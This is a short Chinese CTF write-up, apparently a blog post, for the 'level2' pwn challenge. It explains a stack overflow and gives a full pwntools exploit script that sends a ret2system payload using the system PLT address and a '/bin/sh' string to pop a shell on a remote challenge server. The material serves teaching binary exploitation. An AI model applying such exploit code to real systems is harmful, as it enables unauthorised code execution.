level2攻防世界pwn

checksec后试运行


放入64位ida



典型栈溢出

发现system,但参数不对,那我们shift+F12查看字符串,发现binsh,地址为0x0804A024


system在plt的地址为0x08048320

写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',31028)

system_plt = 0x08048320
binsh = 0x0804A024

payload = ''
payload += 'A'*0x88
payload += p32(0)
payload += p32(system_plt)
payload += p32(0)
payload += p32(binsh)

p.sendline(payload)
p.interactive()
成功
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 4,533评论 0 5
  • 一、Python简介和环境搭建以及pip的安装 4课时实验课主要内容 【Python简介】: Python 是一个...
    _小老虎_阅读 5,926评论 0 10
  • 一个月的约定快要到了,疯狂补栈溢出知识,偷看大佬们博客,希望学到点什么。 栈溢出学习网站 CTF Wiki 栈溢出...
    杰_74阅读 563评论 0 1
  • 0x01 Start checksec 的时候可以看到程序没有打开任何的安全保护措施,然后查看IDA下的汇编代码,...
    Nevv阅读 1,730评论 0 2
  • 一直很想有个地方能写自己认为有用,对别的开发者也能有益,便捷的文章. 感觉简书的页面比较简洁,希望以后能坚持写Blog.
    付寒宇阅读 132评论 0 0